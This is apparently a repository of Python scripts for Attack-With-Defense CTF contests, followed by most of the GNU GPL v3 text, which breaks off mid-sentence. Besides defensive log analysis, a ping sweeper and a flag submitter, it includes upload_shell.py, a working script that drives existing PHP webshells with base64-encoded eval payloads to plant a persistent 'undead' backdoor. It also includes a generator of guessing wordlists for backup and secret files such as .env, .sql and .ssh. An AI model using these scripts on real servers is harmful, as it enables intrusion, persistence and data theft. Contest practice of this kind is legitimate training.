  • ',b) 28 | 29 | ipaddrs = str(response[0][5:])+','+str(response[1][6:])+','+str(response[2][6:-5]) 30 | 31 | return ipaddrs 32 | 33 | 34 | def find_ipaddrs(ip): 35 | 36 | 37 | 38 | html = url_open(ip) 39 | 40 | ipaddrs = find_ip(html) 41 | 42 | 43 | print(ip+' : '+ipaddrs) 44 | -------------------------------------------------------------------------------- /AWD-Script/Python/main.py: -------------------------------------------------------------------------------- 1 | import re 2 | import os 3 | import sys 4 | from datetime import datetime 5 | import url 6 | import attack 7 | import ipfind 8 | 9 | 10 | 11 | 12 | needlist = url.needlist 13 | 14 | sqllist,xsslist,senlist = [],[],[] 15 | 16 | otherurl,iplist = [],[] 17 | 18 | 19 | [xssip,sqlip,senip,sqllist,xsslist,senlist,otherurl]=attack.find_attack(needlist) 20 | 21 | xssip = list(set(xssip)) 22 | 23 | sqlip = list(set(sqlip)) 24 | 25 | senip = list(set(senip)) 26 | 27 | print('>>>>>>>检测出xss攻击'+str(len(xsslist))+'次'+'共计'+str(len(xssip))+'个ip') 28 | print(xssip) 29 | print('>>>>>>>检测出sql攻击'+str(len(sqllist))+'次'+'共计'+str(len(sqlip))+'个ip') 30 | print(sqlip) 31 | print('>>>>>>>检测出敏感目录扫描'+str(len(senlist))+'次'+'共计'+str(len(senip))+'个ip') 32 | print(senip) 33 | 34 | iplist = list(set(xssip+sqlip+senip)) 35 | print(len(iplist)) 36 | 37 | print('开始分析ip地理位置') 38 | for i in iplist: 39 | 40 | ipfind.find_ipaddrs(str(i)) -------------------------------------------------------------------------------- /AWD-Script/Python/upload_shell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #coding=utf-8 3 | 4 | import sys,requests,base64 5 | 6 | ''' 7 | Usage: 8 | 将所需要传shell的url放在webshell.txt中,格式如下: 9 | url(含http:// or https://),method(请求方式),passwd 10 | http://127.0.0.1:80/1110/x.php,post,x 11 | http://127.0.0.2/1110/x.php,post,x 12 | http://127.0.0.3/1110/x.php,post,x 13 | 14 | tips: 别在","前后放空格。 15 | ''' 16 | #获取靶机的绝对路径 17 | def getpath(url,method,passwd): 18 | data = {} 19 | if method == "get": 20 | data[passwd] = '@eval(base64_decode($_GET[z0]));' 21 | data['z0'] = 'ZWNobyAkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ107' 22 | res = requests.get(url,params=data) 23 | return res.content.strip() 24 | elif method == "post" : 25 | data[passwd] = '@eval(base64_decode($_POST[z0]));' 26 | data['z0'] = 'ZWNobyAkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ107' 27 | res = requests.post(url,data=data) 28 | #print data 29 | return res.content.strip() 30 | else : 31 | return 0 32 | 33 | #加载要上传的后门内容 34 | def loadfile(filepath): 35 | try : 36 | file = open(filepath,"rb") 37 | return str(file.read()) 38 | except : 39 | print "File %s Not Found!" %filepath 40 | sys.exit() 41 | 42 | #写马函数 43 | def upload(url,method,passwd): 44 | #http://127.0.0.1:80/1110/x.php,post,x 45 | ''' 46 | 1.http or https 47 | 2.端口要放在ip变量中 48 | 3.Rfile /1110/x.php 49 | ''' 50 | try: 51 | url.index("http") 52 | #去除http:// ==> 127.0.0.1:80/1110/x.php 53 | urlstr=url[7:] 54 | lis = urlstr.split("/") 55 | ip=str(lis[0]) 56 | Rfile = "" 57 | for i in range(1,len(lis)): 58 | Rfile = Rfile+"/"+str(lis[i]) 59 | except : 60 | urlstr=url[8:] 61 | lis = urlstr.split("/") 62 | ip=str(lis[0]) 63 | Rfile = "" 64 | for i in range(1,len(lis)): 65 | Rfile = Rfile+"/"+str(lis[i]) 66 | #判断shell是否存在 67 | try : 68 | res = requests.get(url,timeout=10) 69 | except : 70 | print "[-] %s ERR_CONNECTION_TIMED_OUT" %url 71 | return 0 72 | if res.status_code!=200 : 73 | print "[-] %s Page Not Found!" %url 74 | return 0 75 | 76 | #加载要写入的内容 77 | shellPath = "./shell.php" 78 | shell_content = loadfile(shellPath) 79 | 80 | #获取靶机的绝对路径 81 | Rpath = getpath(url,method,passwd)#D:/phpStudy/WWW/1110/x.php 82 | list0 = Rpath.split("/") 83 | Rpath = "" 84 | for i in range(0,(len(list0)-1)): 85 | Rpath = Rpath+list0[i]+"/" 86 | data = {} 87 | #判断method 88 | if method =="post" : 89 | data[passwd] = "@eval(base64_decode($_POST['z0']));" 90 | data['z0'] = 'QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzsKJGY9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoxIl0pOwokYz1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejIiXSk7CiRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOwokYz1zdHJfcmVwbGFjZSgiXG4iLCIiLCRjKTsKJGJ1Zj0iIjsKZm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MSkKICAgICRidWYuPXN1YnN0cigkYywkaSwxKTsKZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1ZikpOwplY2hvKCJ8PC0iKTsKZGllKCk7' 91 | data['z1'] = base64.b64encode(Rpath+"/fuck.php") 92 | data["z2"] = base64.b64encode(shell_content) 93 | #print data 94 | res = requests.post(url,data=data) 95 | elif method=="get" : 96 | data[passwd] = "@eval(base64_decode($_GET['z0']));" 97 | data['z0'] = 'QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzsKJGY9YmFzZTY0X2RlY29kZSgkX0dFVFsiejEiXSk7CiRjPWJhc2U2NF9kZWNvZGUoJF9HRVRbInoyIl0pOwokYz1zdHJfcmVwbGFjZSgiXHIiLCIiLCRjKTsKJGM9c3RyX3JlcGxhY2UoIlxuIiwiIiwkYyk7CiRidWY9IiI7CmZvcigkaT0wOyRpPHN0cmxlbigkYyk7JGkrPTEpCiAgICAkYnVmLj1zdWJzdHIoJGMsJGksMSk7CmVjaG8oQGZ3cml0ZShmb3BlbigkZiwidyIpLCRidWYpKTsKZWNobygifDwtIik7CmRpZSgpOw==' 98 | data['z1'] = base64.b64encode(Rpath+"/fuck.php") 99 | data["z2"] = base64.b64encode(shell_content) 100 | res = requests.post(url,params=data) 101 | else : 102 | print "method err!" 103 | sys.exit() 104 | 105 | #判断是否上传成功,失败直接跳过 106 | #print res.content 107 | if res.status_code!=200: 108 | print "[-] %s upload failed!" %ip 109 | return 0 110 | 111 | #激活不死马 112 | list=Rfile.split("/") 113 | b_url="http://"+ip 114 | max = len(list)-1 115 | for i in range(1,max): 116 | b_url=b_url+"/"+list[i] 117 | bsm_url = b_url+"/fuck.php" 118 | try : 119 | res = requests.get(bsm_url,timeout=3) 120 | except : 121 | pass 122 | #尝试访问不死马生成的shell 123 | shell_url = b_url+"/.index.php" 124 | res = requests.get(shell_url) 125 | if res.status_code!=200 : 126 | print "[-] %s create shell failed!" %bsm_url 127 | return 0 128 | #输出shell地址 129 | print "[+] %s upload sucessed!" %shell_url 130 | 131 | 132 | if __name__ == '__main__': 133 | shellstr=loadfile("./webshell.txt") 134 | list = shellstr.split("\r\n") 135 | #print str(list) 136 | i = 0 137 | url={} 138 | passwd={} 139 | method={} 140 | for data in list: 141 | if data: 142 | ls = data.split(",") 143 | method_tmp = str(ls[1]) 144 | method_tmp = method_tmp.lower() 145 | if method_tmp=='post' or method_tmp=='get': 146 | url[i]=str(ls[0]) 147 | method[i]=method_tmp 148 | passwd[i]=str(ls[2]) 149 | i+=1 150 | else : 151 | print "[-] %s request method error!" %(str(ls[0])) 152 | else : pass 153 | for j in range(len(url)): 154 | #print "url is %s method is %s passwd is %s" %(url[j],method[j],passwd[j]) 155 | upload(url=url[j],method=method[j],passwd=passwd[j]) 156 | -------------------------------------------------------------------------------- /AWD-Script/Python/url.py: -------------------------------------------------------------------------------- 1 | import re 2 | import os 3 | import sys 4 | from datetime import datetime 5 | 6 | 7 | dt = datetime.now() 8 | 9 | date = str(dt.date()) 10 | 11 | 12 | 13 | loglist = [] # 14 | iplist = [] # ip统计 15 | urllist = [] # url统计列表 16 | needlist = [] # 需要统计的 17 | errorlist = [] # 格式错误的列表 18 | ipdict,urldict = {},{} 19 | 20 | 21 | rizhi = str(input('请输入要分析的日志文件名')) 22 | 23 | def find_log(): 24 | 25 | print('>>>>>>>开始解析日志') 26 | 27 | with open(rizhi,'r',encoding='UTF-8',errors='ignore') as f: 28 | 29 | #loglist = f.readlines() 30 | 31 | for i in f.readlines(): # 32 | 33 | if i[0] != '#': 34 | 35 | b = re.split(' ',i) 36 | 37 | iplist.append(b[10]) 38 | 39 | urllist.append(b[6]) 40 | 41 | try: 42 | 43 | needlist.append([b[10],b[1],b[5],b[6],b[15]]) 44 | 45 | except: 46 | 47 | errorlist.append(i) 48 | 49 | print('>>>>>>>日志解析完毕') 50 | 51 | def count(iplist,urllist): #统计ip url访问量函数 52 | 53 | print('>>>>>>>开始分析url与ip访问量') 54 | 55 | global ipdict,urldict 56 | 57 | for i in set(iplist): 58 | 59 | ipdict[i] = iplist.count(i) 60 | 61 | for i in set(urllist): 62 | 63 | urldict[i] = urllist.count(i) 64 | 65 | 66 | ipdict = sorted(ipdict.items(),key=lambda d: d[1], reverse=True) 67 | 68 | urldict = sorted(urldict.items(),key=lambda d: d[1], reverse=True) 69 | 70 | print(type(urldict)) 71 | 72 | iplist = list(ipdict) 73 | 74 | urllist = list(urldict) 75 | 76 | ipdict,urldict = {},{} 77 | 78 | print('>>>>>url与ip分析完毕.......') 79 | 80 | 81 | return [iplist,urllist] 82 | 83 | def save_count(): 84 | 85 | print('>>>>>>>正在保存分析结果') 86 | 87 | ipname = 'ip-'+date+'.txt' 88 | 89 | urlname = 'url-'+date+'.txt' 90 | 91 | with open(ipname,'w') as f: 92 | 93 | for i in iplist: 94 | 95 | f.write(str(list(i))+'\n') 96 | 97 | with open(urlname,'w') as f: 98 | 99 | for i in urllist: 100 | 101 | f.write(str(list(i))+'\n') 102 | 103 | print('>>>>>>>分析结果保存完毕') 104 | 105 | find_log() 106 | 107 | [iplist,urllist] = count(iplist,urllist) 108 | 109 | save_count() -------------------------------------------------------------------------------- /AWD-Script/Python/处理B段.py: -------------------------------------------------------------------------------- 1 | import ipaddress 2 | 3 | # 输入CIDR表示的子网 4 | cidr_input = input("请输入CIDR表示的子网地址(例如,10.219.1.1/16): ") 5 | 6 | try: 7 | network = ipaddress.IPv4Network(cidr_input, strict=False) 8 | except ipaddress.AddressValueError as e: 9 | print("无效的CIDR表示:", e) 10 | except ValueError as e: 11 | print("无效的CIDR表示:", e) 12 | else: 13 | # 生成IP地址列表 14 | ip_list = [str(ip) for ip in network.hosts()] 15 | 16 | # 将IP地址保存到文本文件 17 | filename = "ip_addresses.txt" 18 | with open(filename, 'w') as file: 19 | file.write("\n".join(ip_list)) 20 | 21 | print(f"已将IP地址保存到 {filename} 文件中。") 22 | -------------------------------------------------------------------------------- /AWD-Script/Python/提交flag.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | import sys 3 | import json 4 | import urllib 5 | import httplib 6 | server_host = ' ' #提交flag的服务器地址 7 | server_port = 80 8 | def submit(team_token, flag, host=server_host, port=server_port, timeout=5): 9 | if not team_token or not flag: 10 | raise Exception('team token or flag wrong') 11 | conn = httplib.HTTPConnection(host, port, timeout=timeout) 12 | params = urllib.urlencode({ #提交需要post的参数,根据情况修改 13 | 'token': team_token, 14 | 'flag': flag, 15 | }) 16 | headers = { 17 | "Content-type": "application/x-www-form-urlencode" 18 | } 19 | conn.request('POST', '[submit_flag_dir]', params, headers) #第二个参数为提交flag的目录 20 | response = conn.getresponse() 21 | data = response.read() 22 | return json.loads(data) 23 | 24 | if __name__ == '__main__': 25 | if len(sys.argv) < 3: 26 | print 'usage: ./submitflag.py [team_token] [flag]' 27 | sys.exit() 28 | host = server_host 29 | if len(sys.argv) > 3: 30 | host = sys.argv[3] 31 | print json.dumps(submit(sys.argv[1], sys.argv[2], host=host), indent=4) -------------------------------------------------------------------------------- /AWD-Script/Python/根据URL生成字典.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | 3 | # 根据URL生成特定目标网站备份文件猜测字典 4 | 5 | suffixList = ['.rar','.zip','.sql','.gz','.tar','.bz2','.tar.gz','.bak','.dat','.mdb','.env','.config','.md','.js','.json','.ini','.inf','.py','.txt','.doc','.docx','.xml','.swp','.yaml','.yml','.log','.conf','.ssh','.lock','.sqlite','.sqlite3','.info'] 6 | 7 | keyList=['install','admin','sa','back','backup','说明','install','INSTALL','index','INDEX','wwwroot','WWWROOT','www','WWW','root','ROOT','web','WEB','备份','新建文件夹','config','readme','setup','SETUP'] 8 | 9 | # 请输入目标URL 10 | 11 | print "Please input the url:" 12 | url = raw_input() 13 | 14 | if (url[:5] == 'http:'): 15 | url = url[7:].strip() 16 | 17 | if (url[:6] == 'https:'): 18 | url = url[8:].strip() 19 | 20 | numT = url.find('/') 21 | 22 | if(numT != -1): 23 | url = url - url[:numT] 24 | 25 | # 根据URL,推测一些针对性的文件名: 26 | 27 | num1 = url.find('.') 28 | num2 = url.find('.',num1 + 1) 29 | 30 | keyList.append(url[num1 + 1:num2]) 31 | keyList.append(url[num1 + 1:num2].upper()) 32 | 33 | keyList.append(url) # www.test.com 34 | keyList.append(url.upper()) 35 | 36 | keyList.append(url.replace('.','_')) # www_test_com 37 | keyList.append(url.replace('.','_').upper()) 38 | 39 | keyList.append(url.replace('.','')) # wwwtestcom 40 | keyList.append(url.replace('.','').upper()) 41 | 42 | keyList.append(url[num1 + 1:]) # test.com 43 | keyList.append(url[num1 + 1:].upper()) 44 | 45 | keyList.append(url[num1 + 1:].replace('.','_')) # test_com 46 | keyList.append(url[num1 + 1:].replace('.','_').upper()) 47 | 48 | # 生成字典列表,并写入txt文件: 49 | 50 | tempList =[] 51 | 52 | for key in keyList: 53 | for suff in suffixList: 54 | tempList.append(key + suff) 55 | 56 | fobj = open("success.txt",'w') 57 | 58 | for each in tempList: 59 | each ='/' + each 60 | fobj.write('%s%s' %(each,'\n')) 61 | fobj.flush() 62 | 63 | print 'OK!' -------------------------------------------------------------------------------- /AWD-Script/Python/靶机ping扫描.py: -------------------------------------------------------------------------------- 1 | import platform 2 | import sys 3 | import os 4 | import time 5 | from multiprocessing import Pool 6 | from multiprocessing.dummy import Pool as ThreadPool 7 | 8 | iplist = [] 9 | def get_os(): 10 | os = platform.system() 11 | if os == "Windows": 12 | return "n" 13 | else: 14 | return "c" 15 | 16 | def ping_ip(ip_str): 17 | cmd = ["ping", "-{op}".format(op=get_os()), 18 | "1", ip_str] 19 | output = os.popen(" ".join(cmd)).readlines() 20 | 21 | flag = False 22 | for line in list(output): 23 | if not line: 24 | continue 25 | if str(line).upper().find("TTL") >=0: 26 | flag = True 27 | break 28 | if flag: 29 | print "ip: %s is ok ***"%ip_str 30 | #else: 31 | #print "ip: %s is fail ***"%ip_str 32 | 33 | def find_ip(ip_prefix): 34 | for i in range(1,256): 35 | ip = '%s.%s'%(ip_prefix,i) 36 | iplist.append(ip) 37 | 38 | if __name__ == "__main__": 39 | start_time = time.time() 40 | commandargs = sys.argv[1:] 41 | args = "".join(commandargs) 42 | 43 | ip_prefix = '.'.join(args.split('.')[:-1]) 44 | find_ip(ip_prefix) 45 | #pool = ThreadPool(50) 46 | pool = Pool(50) 47 | pool.map(ping_ip,iplist) 48 | pool.close() 49 | pool.join() 50 | print time.time()-start_time -------------------------------------------------------------------------------- /AWD-Script/Readme.md: -------------------------------------------------------------------------------- 1 | 本目录存放AWD比赛所需的脚本 2 | 3 | 脚本主要来源于开源项目:[https://github.com/admintony/Prepare-for-AWD](https://github.com/admintony/Prepare-for-AWD) 4 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 3, 29 June 2007 3 | 4 | Copyright (C) 2007 Free Software Foundation, Inc. 5 | Everyone is permitted to copy and distribute verbatim copies 6 | of this license document, but changing it is not allowed. 7 | 8 | Preamble 9 | 10 | The GNU General Public License is a free, copyleft license for 11 | software and other kinds of works. 12 | 13 | The licenses for most software and other practical works are designed 14 | to take away your freedom to share and change the works. By contrast, 15 | the GNU General Public License is intended to guarantee your freedom to 16 | share and change all versions of a program--to make sure it remains free 17 | software for all its users. We, the Free Software Foundation, use the 18 | GNU General Public License for most of our software; it applies also to 19 | any other work released this way by its authors. You can apply it to 20 | your programs, too. 21 | 22 | When we speak of free software, we are referring to freedom, not 23 | price. Our General Public Licenses are designed to make sure that you 24 | have the freedom to distribute copies of free software (and charge for 25 | them if you wish), that you receive source code or can get it if you 26 | want it, that you can change the software or use pieces of it in new 27 | free programs, and that you know you can do these things. 28 | 29 | To protect your rights, we need to prevent others from denying you 30 | these rights or asking you to surrender the rights. Therefore, you have 31 | certain responsibilities if you distribute copies of the software, or if 32 | you modify it: responsibilities to respect the freedom of others. 33 | 34 | For example, if you distribute copies of such a program, whether 35 | gratis or for a fee, you must pass on to the recipients the same 36 | freedoms that you received. You must make sure that they, too, receive 37 | or can get the source code. And you must show them these terms so they 38 | know their rights. 39 | 40 | Developers that use the GNU GPL protect your rights with two steps: 41 | (1) assert copyright on the software, and (2) offer you this License 42 | giving you legal permission to copy, distribute and/or modify it. 43 | 44 | For the developers' and authors' protection, the GPL clearly explains 45 | that there is no warranty for this free software. For both users' and 46 | authors' sake, the GPL requires that modified versions be marked as 47 | changed, so that their problems will not be attributed erroneously to 48 | authors of previous versions. 49 | 50 | Some devices are designed to deny users access to install or run 51 | modified versions of the software inside them, although the manufacturer 52 | can do so. This is fundamentally incompatible with the aim of 53 | protecting users' freedom to change the software. The systematic 54 | pattern of such abuse occurs in the area of products for individuals to 55 | use, which is precisely where it is most unacceptable. Therefore, we 56 | have designed this version of the GPL to prohibit the practice for those 57 | products. If such problems arise substantially in other domains, we 58 | stand ready to extend this provision to those domains in future versions 59 | of the GPL, as needed to protect the freedom of users. 60 | 61 | Finally, every program is threatened constantly by software patents. 62 | States should not allow patents to restrict development and use of 63 | software on general-purpose computers, but in those that do, we wish to 64 | avoid the special danger that patents applied to a free program could 65 | make it effectively proprietary. To prevent this, the GPL assures that 66 | patents cannot be used to render the program non-free. 67 | 68 | The precise terms and conditions for copying, distribution and 69 | modification follow. 70 | 71 | TERMS AND CONDITIONS 72 | 73 | 0. Definitions. 74 | 75 | "This License" refers to version 3 of the GNU General Public License. 76 | 77 | "Copyright" also means copyright-like laws that apply to other kinds of 78 | works, such as semiconductor masks. 79 | 80 | "The Program" refers to any copyrightable work licensed under this 81 | License. Each licensee is addressed as "you". "Licensees" and 82 | "recipients" may be individuals or organizations. 83 | 84 | To "modify" a work means to copy from or adapt all or part of the work 85 | in a fashion requiring copyright permission, other than the making of an 86 | exact copy. The resulting work is called a "modified version" of the 87 | earlier work or a work "based on" the earlier work. 88 | 89 | A "covered work" means either the unmodified Program or a work based 90 | on the Program. 91 | 92 | To "propagate" a work means to do anything with it that, without 93 | permission, would make you directly or secondarily liable for 94 | infringement under applicable copyright law, except executing it on a 95 | computer or modifying a private copy. Propagation includes copying, 96 | distribution (with or without modification), making available to the 97 | public, and in some countries other activities as well. 98 | 99 | To "convey" a work means any kind of propagation that enables other 100 | parties to make or receive copies. Mere interaction with a user through 101 | a computer network, with no transfer of a copy, is not conveying. 102 | 103 | An interactive user interface displays "Appropriate Legal Notices" 104 | to the extent that it includes a convenient and prominently visible 105 | feature that (1) displays an appropriate copyright notice, and (2) 106 | tells the user that there is no warranty for the work (except to the 107 | extent that warranties are provided), that licensees may convey the 108 | work under this License, and how to view a copy of this License. If 109 | the interface presents a list of user commands or options, such as a 110 | menu, a prominent item in the list meets this criterion. 111 | 112 | 1. Source Code. 113 | 114 | The "source code" for a work means the preferred form of the work 115 | for making modifications to it. "Object code" means any non-source 116 | form of a work. 117 | 118 | A "Standard Interface" means an interface that either is an official 119 | standard defined by a recognized standards body, or, in the case of 120 | interfaces specified for a particular programming language, one that 121 | is widely used among developers working in that language. 122 | 123 | The "System Libraries" of an executable work include anything, other 124 | than the work as a whole, that (a) is included in the normal form of 125 | packaging a Major Component, but which is not part of that Major 126 | Component, and (b) serves only to enable use of the work with that 127 | Major Component, or to implement a Standard Interface for which an 128 | implementation is available to the public in source code form. A 129 | "Major Component", in this context, means a major essential component 130 | (kernel, window system, and so on) of the specific operating system 131 | (if any) on which the executable work runs, or a compiler used to 132 | produce the work, or an object code interpreter used to run it. 133 | 134 | The "Corresponding Source" for a work in object code form means all 135 | the source code needed to generate, install, and (for an executable 136 | work) run the object code and to modify the work, including scripts to 137 | control those activities. However, it does not include the work's 138 | System Libraries, or general-purpose tools or generally available free 139 | programs which are used unmodified in performing those activities but 140 | which are not part of the work. For example, Corresponding Source 141 | includes interface definition files associated with source files for 142 | the work, and the source code for shared libraries and dynamically 143 | linked subprograms that the work is specifically designed to require, 144 | such as by intimate data communication or control flow between those 145 | subprograms and other parts of the work. 146 | 147 | The Corresponding Source need not include anything that users 148 | can regenerate automatically from other parts of the Corresponding 149 | Source. 150 | 151 | The Corresponding Source for a work in source code form is that 152 | same work. 153 | 154 | 2. Basic Permissions. 155 | 156 | All rights granted under this License are granted for the term of 157 | copyright on the Program, and are irrevocable provided the stated 158 | conditions are met. This License explicitly affirms your unlimited 159 | permission to run the unmodified Program. The output from running a 160 | covered work is covered by this License only if the output, given its 161 | content, constitutes a covered work. This License acknowledges your 162 | rights of fair use or other equivalent, as provided by copyright law. 163 | 164 | You may make, run and propagate covered works that you do not 165 | convey, without conditions so long as your license otherwise remains 166 | in force. You may convey covered works to others for the sole purpose 167 | of having them make modifications exclusively for you, or provide you 168 | with facilities for running those works, provided that you comply with 169 | the terms of this License in conveying all material for which you do 170 | not control copyright. Those thus making or running the covered works 171 | for you must do so exclusively on your behalf, under your direction 172 | and control, on terms that prohibit them from making any copies of 173 | your copyrighted material outside their relationship with you. 174 | 175 | Conveying under any other circumstances is permitted solely under 176 | the conditions stated below. Sublicensing is not allowed; section 10 177 | makes it unnecessary. 178 | 179 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law. 180 | 181 | No covered work shall be deemed part of an effective technological 182 | measure under any applicable law fulfilling obligations under article 183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or 184 | similar laws prohibiting or restricting circumvention of such 185 | measures. 186 | 187 | When you convey a covered work, you waive any legal power to forbid 188 | circumvention of technological measures to the extent such circumvention 189 | is effected by exercising rights under this License with respect to 190 | the covered work, and you disclaim any intention to limit operation or 191 | modification of the work as a means of enforcing, against the work's 192 | users, your or third parties' legal rights to forbid circumvention of 193 | technological measures. 194 | 195 | 4. Conveying Verbatim Copies. 196 | 197 | You may convey verbatim copies of the Program's source code as you 198 | receive it, in any medium, provided that you conspicuously and 199 | appropriately publish on each copy an appropriate copyright notice; 200 | keep intact all notices stating that this License and any 201 | non-permissive terms added in accord with section 7 apply to the code; 202 | keep intact all notices of the absence of any warranty; and give all 203 | recipients a copy of this License along with the Program. 204 | 205 | You may charge any price or no price for each copy that you convey, 206 | and you may offer support or warranty protection for a fee. 207 | 208 | 5. Conveying Modified Source Versions. 209 | 210 | You may convey a work based on the Program, or the modifications to 211 | produce it from the Program, in the form of source code under the 212 | terms of section 4, provided that you also meet all of these conditions: 213 | 214 | a) The work must carry prominent notices stating that you modified 215 | it, and giving a relevant date. 216 | 217 | b) The work must carry prominent notices stating that it is 218 | released under this License and any conditions added under section 219 | 7. This requirement modifies the requirement in section 4 to 220 | "keep intact all notices". 221 | 222 | c) You must license the entire work, as a whole, under this 223 | License to anyone who comes into possession of a copy. This 224 | License will therefore apply, along with any applicable section 7 225 | additional terms, to the whole of the work, and all its parts, 226 | regardless of how they are packaged. This License gives no 227 | permission to license the work in any other way, but it does not 228 | invalidate such permission if you have separately received it. 229 | 230 | d) If the work has interactive user interfaces, each must display 231 | Appropriate Legal Notices; however, if the Program has interactive 232 | interfaces that do not display Appropriate Legal Notices, your 233 | work need not make them do so. 234 | 235 | A compilation of a covered work with other separate and independent 236 | works, which are not by their nature extensions of the covered work, 237 | and which are not combined with it such as to form a larger program, 238 | in or on a volume of a storage or distribution medium, is called an 239 | "aggregate" if the compilation and its resulting copyright are not 240 | used to limit the access or legal rights of the compilation's users 241 | beyond what the individual works permit. Inclusion of a covered work 242 | in an aggregate does not cause this License to apply to the other 243 | parts of the aggregate. 244 | 245 | 6. Conveying Non-Source Forms. 246 | 247 | You may convey a covered work in object code form under the terms 248 | of sections 4 and 5, provided that you also convey the 249 | machine-readable Corresponding Source under the terms of this License, 250 | in one of these ways: 251 | 252 | a) Convey the object code in, or embodied in, a physical product 253 | (including a physical distribution medium), accompanied by the 254 | Corresponding Source fixed on a durable physical medium 255 | customarily used for software interchange. 256 | 257 | b) Convey the object code in, or embodied in, a physical product 258 | (including a physical distribution medium), accompanied by a 259 | written offer, valid for at least three years and valid for as 260 | long as you offer spare parts or customer support for that product 261 | model, to give anyone who possesses the object code either (1) a 262 | copy of the Corresponding Source for all the software in the 263 | product that is covered by this License, on a durable physical 264 | medium customarily used for software interchange, for a price no 265 | more than your reasonable cost of physically performing this 266 | conveying of source, or (2) access to copy the 267 | Corresponding Source from a network server at no charge. 268 | 269 | c) Convey individual copies of the object code with a copy of the 270 | written offer to provide the Corresponding Source. This 271 | alternative is allowed only occasionally and noncommercially, and 272 | only if you received the object code with such an offer, in accord 273 | with subsection 6b. 274 | 275 | d) Convey the object code by offering access from a designated 276 | place (gratis or for a charge), and offer equivalent access to the 277 | Corresponding Source in the same way through the same place at no 278 | further charge. You need not require recipients to copy the 279 | Corresponding Source along with the object code. If the place to 280 | copy the object code is a network server, the Corresponding Source 281 | may be on a different server (operated by you or a third party) 282 | that supports equivalent copying facilities, provided you maintain 283 | clear directions next to the object code saying where to find the 284 | Corresponding Source. Regardless of what server hosts the 285 | Corresponding Source, you remain obligated to ensure that it is 286 | available for as long as needed to satisfy these requirements. 287 | 288 | e) Convey the object code using peer-to-peer transmission, provided 289 | you inform other peers where the object code and Corresponding 290 | Source of the work are being offered to the general public at no 291 | charge under subsection 6d. 292 | 293 | A separable portion of the object code, whose source code is excluded 294 | from the Corresponding Source as a System Library, need not be 295 | included in conveying the object code work. 296 | 297 | A "User Product" is either (1) a "consumer product", which means any 298 | tangible personal property which is normally used for personal, family, 299 | or household purposes, or (2) anything designed or sold for incorporation 300 | into a dwelling. In determining whether a product is a consumer product, 301 | doubtful cases shall be resolved in favor of coverage. For a particular 302 | product received by a particular user, "normally used" refers to a 303 | typical or common use of that class of product, regardless of the status 304 | of the particular user or of the way in which the particular user 305 | actually uses, or expects or is expected to use, the product. A product 306 | is a consumer product regardless of whether the product has substantial 307 | commercial, industrial or non-consumer uses, unless such uses represent 308 | the only significant mode of use of the product. 309 | 310 | "Installation Information" for a User Product means any methods, 311 | procedures, authorization keys, or other information required to install 312 | and execute modified versions of a covered work in that User Product from 313 | a modified version of its Corresponding Source. The information must 314 | suffice to ensure that the continued functioning of the modified object 315 | code is in no case prevented or interfered with solely because 316 | modification has been made. 317 | 318 | If you convey an object code work under this section in, or with, or 319 | specifically for use in, a User Product, and the conveying occurs as 320 | part of a transaction in which the right of possession and use of the 321 | User Product is transferred to the recipient in perpetuity or for a 322 | fixed term (regardless of how the transaction is characterized), the 323 | Corresponding Source conveyed under this section must be accompanied 324 | by the Installation Information. But this requirement does not apply 325 | if neither you nor any third party retains the ability to install 326 | modified object code on the User Product (for example, the work has 327 | been installed in ROM). 328 | 329 | The requirement to provide Installation Information does not include a 330 | requirement to continue to provide support service, warranty, or updates 331 | for a work that has been modified or installed by the recipient, or for 332 | the User Product in which it has been modified or installed. Access to a 333 | network may be denied when the modification itself materially and 334 | adversely affects the operation of the network or violates the rules and 335 | protocols for communication across the network. 336 | 337 | Corresponding Source conveyed, and Installation Information provided, 338 | in accord with this section must be in a format that is publicly 339 | documented (and with an implementation available to the public in 340 | source code form), and must require no special password or key for 341 | unpacking, reading or copying. 342 | 343 | 7. Additional Terms. 344 | 345 | "Additional permissions" are terms that supplement the terms of this 346 | License by making exceptions from one or more of its conditions. 347 | Additional permissions that are applicable to the entire Program shall 348 | be treated as though they were included in this License, to the extent 349 | that they are valid under applicable law. If additional permissions 350 | apply only to part of the Program, that part may be used separately 351 | under those permissions, but the entire Program remains governed by 352 | this License without regard to the additional permissions. 353 | 354 | When you convey a copy of a covered work, you may at your option 355 | remove any additional permissions from that copy, or from any part of 356 | it. (Additional permissions may be written to require their own 357 | removal in certain cases when you modify the work.) You may place 358 | additional permissions on material, added by you to a covered work, 359 | for which you have or can give appropriate copyright permission. 360 | 361 | Notwithstanding any other provision of this License, for material you 362 | add to a covered work, you may (if authorized by the copyright holders of 363 | that material) supplement the terms of this License with terms: 364 | 365 | a) Disclaiming warranty or limiting liability differently from the 366 | terms of sections 15 and 16 of this License; or 367 | 368 | b) Requiring preservation of specified reasonable legal notices or 369 | author attributions in that material or in the Appropriate Legal 370 | Notices displayed by works containing it; or 371 | 372 | c) Prohibiting misrepresentation of the origin of that material, or 373 | requiring that modified versions of such material be marked in 374 | reasonable ways as different from the original version; or 375 | 376 | d) Limiting the use for publicity purposes of names of licensors or 377 | authors of the material; or 378 | 379 | e) Declining to grant rights under trademark law for use of some 380 | trade names, trademarks, or service marks; or 381 | 382 | f) Requiring indemnification of licensors and authors of that 383 | material by anyone who conveys the material (or modified versions of 384 | it) with contractual assumptions of liability to the recipient, for 385 | any liability that these contractual assumptions directly 